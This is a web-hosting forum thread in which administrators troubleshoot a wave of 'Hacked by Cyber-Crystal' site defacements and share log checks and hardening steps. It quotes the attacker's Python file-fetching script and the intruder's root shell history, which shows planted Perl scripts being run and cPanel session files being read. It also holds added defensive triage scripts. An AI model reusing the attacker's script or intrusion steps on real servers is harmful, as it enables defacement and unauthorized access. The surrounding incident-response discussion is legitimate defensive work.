Hacked by Cyber-Crystal

  #1  
12-06-2011, 04:18 PM
Dig1
WHT Addict
 
Join Date: Mar 2011
Location: florida
Posts: 155

Hacked by Cyber-Crystal


A number of websites on my shared hosting have been hacked and replaced with 1 page, and files added: index.htm, index.php, index.html.
The page will say "Hacked by CYBER-CRYSTALL".
I googled and have noticed thousands of sites are currently being attacked this way.
My question is: what security can I do to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?



  #2  
12-07-2011, 05:34 AM
mike86
Web Hosting Master
 
Join Date: Mar 2011
Location: Edinburgh, UK
Posts: 565
Someone has managed to upload files to your webserver directory. What OS and webserver are you using? Check your webserver logs to see how the files were added.

  #3  
12-07-2011, 05:48 AM
PlotHost-Max
Web Hosting Master
 
Join Date: Jun 2007
Posts: 1,002
Indeed, you should check the server logs. Also update the script you are using (WordPress, etc.) to the latest version.

__________________
PlotHost - Cheap Web Hosting Plans since 2008
24/7 Support | 99.9% Uptime | 15 Days Money Back
Shared & Reseller Plans - Check our hosting OFFER !


  #4  
12-09-2011, 09:09 AM
Lee-RackSRV
Junior Guru
 
Join Date: Jul 2011
Location: Sittingbourne, Kent, UK
Posts: 194
Check server access logs for successful logins:

last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp

Once done, check for hidden dirs:

updatedb
locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."

Assuming you find nothing suspicious here, start checking access logs and such for suspicious items; ensure you check for rootkits also.

I'm afraid it's more likely that your personal computer has been exploited and an FTP client that saves passwords in clear text has allowed these details to be compromised.

Failing this, check the server for possible exploits / out of date software.

Good luck with your search; I hope you keep us up to date.

__________________
RackSRV Communications Limited
UK specialists in Dedicated Servers & Server Colocation
Company: 06856870 VAT: GB 934 7073 15 Tel: 0330 111 4444
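
The `grep Accept` check on /var/log/secure from the post above, carried one step further, as an added example that is not part of the original post: it groups successful sshd logins by user, source IP and method, and lists password logins that followed repeated failures from the same IP. The log lines are constructed samples in the standard sshd syslog format, and the function names are made up for this example.

```bash
# Constructed sample lines in the sshd format found in /var/log/secure.
sample_secure_log() {
  cat <<'EOF'
Dec  6 03:12:40 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 40100 ssh2
Dec  6 03:12:44 web1 sshd[2211]: Failed password for root from 203.0.113.7 port 40112 ssh2
Dec  6 03:12:51 web1 sshd[2214]: Accepted password for root from 203.0.113.7 port 40120 ssh2
Dec  6 03:40:02 web1 sshd[2290]: Accepted password for root from 203.0.113.7 port 40950 ssh2
Dec  6 09:15:30 web1 sshd[3012]: Accepted publickey for admin from 198.51.100.20 port 51515 ssh2
EOF
}

# Count successful sshd logins per user, source IP and auth method.
# Reads the named files, or stdin when none are given.
accepted_logins() {
  awk '/sshd\[[0-9]+\]: Accepted / {
         for (i = 1; i <= NF; i++) if ($i == "Accepted") break
         seen[$(i+3) " " $(i+5) " " $(i+1)]++
       }
       END { for (k in seen) print seen[k], k }' "$@" | sort -k1,1nr -k2
}

# List "user ip failures" for accounts whose first accepted password login
# came after at least MIN failed password attempts from that IP (default 5).
guessed_logins() {
  min=${1:-5}; [ "$#" -gt 0 ] && shift
  awk -v min="$min" '
    /sshd\[[0-9]+\]: Failed password for / {
      for (i = 1; i <= NF; i++) if ($i == "from") break
      failed[$(i+1)]++
    }
    /sshd\[[0-9]+\]: Accepted password for / {
      for (i = 1; i <= NF; i++) if ($i == "from") break
      key = $(i-1) " " $(i+1)
      if (!(key in reported) && failed[$(i+1)] >= min) print key, failed[$(i+1)]
      reported[key] = 1
    }' "$@"
}

# Usage on a live host: accepted_logins /var/log/secure*
#                       guessed_logins 5 /var/log/secure*
```

Logs on a machine that has been rooted can be edited by the intruder, so an empty result here does not clear the host.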

  #5  
12-09-2011, 10:56 AM
amigoserv
Disabled
 
Join Date: Nov 2011
Location: Egypt
Posts: 16
Check scripts on your sites that allow uploading malicious files.

I think this hacker can't do anything except add his index files only, not SQL injection or others.

So I recommend securing your server with the CSF firewall and ModSecurity.

  #6  
12-09-2011, 11:07 AM
lynxus
Lord of live chats
 
Join Date: Jul 2009
Location: UK
Posts: 1,295
My first port of call would be to look at the FTP logs if a lot of people have been done the same way.

My second look would be at any kind of 3rd party scripts that a lot of other people may use (WordPress, mailer scripts, monitoring scripts, etc.).

It's evidently a generic hack that a lot of people are vulnerable to.

__________________
Live Chat Support Software for your Business website - IMsupporting.com

  #7  
12-09-2011, 09:45 PM
ioTerrence
Newbie
 
Join Date: Jul 2010
Location: Salt Lake City, Utah
Posts: 5
A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).

Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

Please lemme know if you find anything I've missed!


Last edited by ioTerrence; 12-09-2011 at 09:48 PM. Reason: Corrected host's url.
  #8  
12-09-2011, 09:51 PM
Dawg
Junior Guru Wannabe
 
Join Date: Jan 2004
Location: Texas
Posts: 79
Quote:
Originally Posted by Dig1
A number of websites on my shared hosting have been hacked and replaced with 1 page, and files added: index.htm, index.php, index.html.
The page will say "Hacked by CYBER-CRYSTALL".
I googled and have noticed thousands of sites are currently being attacked this way.
My question is: what security can I do to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?

Holy cow. A Google search renders hundreds of hacked sites. Looks like someone needs to get a life.

  #9  
12-09-2011, 10:03 PM
ioTerrence
Newbie
 
Join Date: Jul 2010
Location: Salt Lake City, Utah
Posts: 5
Also came across this code floating around online, thanks to the email address they left behind. I don't know anything about Python, but if I'm interpreting it right, part of it is some kind of URL fetcher?

#!/usr/bin/python
# mekad By Cyber-Crystal
#
# Cyb3r.Crystal@Gmail.com

# tryag.cc

import urllib2,re
raw = raw_input('URL CONF : ')
url = urllib2.urlopen(raw)
data = url.read()
finddata = re.findall('href="(.*?)">',data)
for cyb3r in range(len(finddata)):
    try:
        filecon = open(finddata[cyb3r],'a')
        done = urllib2.urlopen(raw+finddata[cyb3r])
        wewe = done.read()
        print "Witteng ....\n"
        filecon.write(wewe)
        print "Done "
    except IOError:
        print "error"

  #10  
12-11-2011, 12:31 PM
Dig1
WHT Addict
 
Join Date: Mar 2011
Location: florida
Posts: 155
UPDATE

Yes, and in /etc/httpd/conf they also added 5 files named 1.pl, 2.pl, 3.pl, etc.
So I figured they had to have accessed root some way and did this and added the files.
In root's bash history:
ls -l /etc/valiases
cd /etc/valiases
ls -la /etc/valiases
ls -la /etc/valiases/
cd /usr/loca/apache
cd /etc/httpd/conf
cat httpd.conf | grep DocumentRoot
nano 1.pl
pico 1.pl
nano 1.pl
yum install nano
nano 1.pl
perl 1.pl
nano 2.pl
perl 2.pl
nano 3.pl
perl 3.pl
ifconfig
nano 4.pl
perl 4.pl
exit
pdw
pwd
ls
locate index.html
cd /var/www
ls
cd html
ls
cd ..
cd /usr/local/apache
cd /usr/local
ls
cd /etc/httpds
cd /etc/httpd
ls
cd conf
cat httpd.conf | grep DocumentRoot
cat /var/cpanel
cat * /var/cpanel/sessions
dec6find /home*/*/public_html -type l
........
So instead of looking for any more compromised files, I reinstalled the OS and added server security hardening like:
rkhunter, DenyHosts, fail2ban, mod_security, AIDE (Advanced Intrusion Detection Environment), and locked down the httpd config (file indexing) and / access. I also made root nologin except by su through a special user with a password of 16 characters, numbers and punctuation, and also tightened PHP and MySQL security.
I reloaded all customers' websites from backup and all is well for now.
My iptables have grown quite a bit.
A few country bans were atoadded and DenyHosts has added to the deny hosts file also.
I am a little more confident now!
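
The history above ends with a search for symbolic links under the accounts' public_html directories, and the defacement dropped index.htm, index.html and index.php. A check for both on restored or neighbouring accounts, as an added example that is not part of the original post; the `<base>/<account>/public_html` layout, the function names and the script name are assumptions.

```bash
#!/usr/bin/env bash
# Added example. Assumes accounts live at <base>/<account>/public_html.

# Print every symlink under a docroot whose target resolves outside the
# owning account's home directory, or does not resolve at all.
escaping_symlinks() {
  base=$1
  for docroot in "$base"/*/public_html; do
    [ -d "$docroot" ] || continue
    home=$(cd "$docroot/.." && pwd -P)
    find "$docroot" -type l -exec sh -c '
      home=$1; shift
      for link; do
        target=$(readlink -f -- "$link" 2>/dev/null) || target=
        case $target in
          "$home"|"$home"/*) ;;   # stays inside the account
          *) printf "%s -> %s\n" "$link" "${target:-<unresolved>}" ;;
        esac
      done' sh "$home" {} +
  done
}

# Print index.htm, index.html and index.php files modified in the last
# DAYS days (default 7), the file names this defacement dropped.
recent_index_files() {
  base=$1 days=${2:-7}
  find "$base"/*/public_html -type f \
    \( -name index.htm -o -name index.html -o -name index.php \) \
    -mtime "-$days" -print 2>/dev/null | sort
}

# Usage: ./triage.sh /home [days]
if [ "$#" -gt 0 ]; then
  echo "== symlinks leaving their account =="; escaping_symlinks "$1"
  echo "== recently modified index files =="; recent_index_files "$1" "${2:-7}"
fi
```

Modification times can be reset by anyone with write access, so the second list is a starting point for comparison against backups or an AIDE database rather than a complete inventory.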

  #11  
12-11-2011, 12:36 PM
lynxus
Lord of live chats
 
Join Date: Jul 2009
Location: UK
Posts: 1,295
Quote:
Originally Posted by Dig1
So instead of looking for any more compromised files, I reinstalled the OS and added server security hardening

Probably the best thing.

- You have identified what's going on and what level of compromise you have had.
- You have taken the best action possible and re-installed, now knowing what to look out for.

If only everyone followed the same method. I see too many posts about people "fixing" a hacked server and leaving it running.

__________________
Live Chat Support Software for your Business website - IMsupporting.com

  #12  
12-11-2011, 02:15 PM
Dig1
WHT Addict
 
Join Date: Mar 2011
Location: florida
Posts: 155
ty yup yup

  #13  
12-12-2011, 06:25 AM
iLoveHosting-UK
Web Hosting Master
 
Join Date: May 2010
Posts: 647
Quote:
Originally Posted by Dig1
A number of websites on my shared hosting have been hacked and replaced with 1 page, and files added: index.htm, index.php, index.html.
The page will say "Hacked by CYBER-CRYSTALL".
I googled and have noticed thousands of sites are currently being attacked this way.
My question is: what security can I do to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?

If it's only a number of sites that have been hacked, it could be due to insecure versions of software. If it was all of the sites, I'm sorry to say, but you have been rooted.

- Ashton

__________________
Ashton Allen | FuseWeb Limited
Premium UK Webhosting
| Shared Hosting | VPS | Reseller Hosting | VOIP |
FuseWeb.co.uk Or follow us on Twitter

  #14  
12-12-2011, 07:26 PM
SafeSrv
Junior Guru
 
Join Date: Apr 2008
Location: UK
Posts: 235
If he can switch directories and read files, your server is not set up properly - and just installing the server software you mentioned may not even be enough; it all has to be configured correctly to be effective.

And btw - this certainly looks like a real SKID

__________________
SafeSrv.net - Secure Hosting, VPN and Management Services.
WHMCS FreeRADIUS VPN Module. - Build a fully featured VPN business in no time.

  #15  
12-12-2011, 07:36 PM
iexo
Disabled
 
Join Date: Feb 2006
Location: Global
Posts: 1,629
Quote:
Originally Posted by ioTerrence
A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).

Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

Please lemme know if you find anything I've missed!

I liked that song.
